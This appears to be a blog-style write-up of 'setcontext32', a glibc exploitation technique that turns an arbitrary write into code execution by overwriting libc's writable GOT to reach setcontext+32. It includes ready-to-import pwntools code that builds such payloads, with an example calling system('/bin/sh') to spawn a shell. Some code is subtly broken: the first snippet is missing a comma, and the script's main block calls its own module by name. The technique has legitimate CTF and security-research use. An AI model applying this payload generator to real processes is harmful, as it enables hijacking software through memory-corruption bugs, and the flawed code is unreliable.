# modern arb write -> rce is hard
Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of `__free_hook` are long gone; now you've got to leak the ptr mangling cookie to modify an existing `__exit_funcs` entry, maybe compute the offset to `ld.so` to overwrite `l_addr` and create a fake `DT_FINI` entry, or perhaps setup special `_codecvt` and `_wide_data` structures on hijacked IO objects... I'd just like to specify the function I want to call and its arguments!
I want a *flexible* RCE primitive. I don't want to rely on `_IO_cleanup`, `_dl_fini`, or `malloc` to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray `system` is stack aligned. I don't want to satisfy several constraints so `one_gadget` will work!
# setcontext32
setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:
```python=
write(libc_write_address, flat(
p64(0),
p64(libc_write_address + 0x218)
p64(setcontext+32),
p64(libc_exe_address) * 0x40,
cpu_state_information,
))
```
Where `libc_write_address` is the start of the writeable page in libc, `libc_exe_address` is the start of the executable page in libc, and `cpu_state_information` is a structure that contains all current registers, including `rsp` and `rip`.
## high level overview
Every GOT entry in libc such as `memset`, `memcpy`, `strcpy`, and `strlen` is replaced with the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake linkmap, `libc_write_address + 0x218`, and calls a fake runtime resolver, `setcontext+32`, all of which starts at the beginning of the writeable page.
`setcontext+32` pops `libc_write_address + 0x218` off the stack, and treats it as a pointer to a saved `ucontext_t`. It'll then load your structure as the current CPU state.
Calling most libc functions will trigger setcontext32, including `malloc`, `exit`, and (almost?) every IO operation.
## why
libc's GOT is writeable so that you may use architecture specific functions, such as `memcpy` optimized for SSE or AVX512. A friend also guessed that it could be for `ltrace`. I learned the libc GOT was writeable from pwndbg creator [disconnect3d](https://twitter.com/disconnect3d_pl).
## code
Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below.
`setcontext32.py`
```python=
from pwn import *
def create_ucontext(
src: int,
rsp=0,
rbx=0,
rbp=0,
r12=0,
r13=0,
r14=0,
r15=0,
rsi=0,
rdi=0,
rcx=0,
r8=0,
r9=0,
rdx=0,
rip=0xDEADBEEF,
) -> bytearray:
b = bytearray(0x200)
b[0xE0:0xE8] = p64(src) # fldenv ptr
b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr
b[0xA0:0xA8] = p64(rsp)
b[0x80:0x88] = p64(rbx)
b[0x78:0x80] = p64(rbp)
b[0x48:0x50] = p64(r12)
b[0x50:0x58] = p64(r13)
b[0x58:0x60] = p64(r14)
b[0x60:0x68] = p64(r15)
b[0xA8:0xB0] = p64(rip) # ret ptr
b[0x70:0x78] = p64(rsi)
b[0x68:0x70] = p64(rdi)
b[0x98:0xA0] = p64(rcx)
b[0x28:0x30] = p64(r8)
b[0x30:0x38] = p64(r9)
b[0x88:0x90] = p64(rdx)
return b
def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
return got, flat(
p64(0),
p64(got + 0x218),
p64(libc.symbols["setcontext"] + 32),
p64(plt_trampoline) * 0x40,
create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
)
if __name__ == "__main__":
libc = ELF("./libc.so.6")
dest, payload = setcontext32.setcontext32(
libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
)
print(hex(dest), payload.hex())
```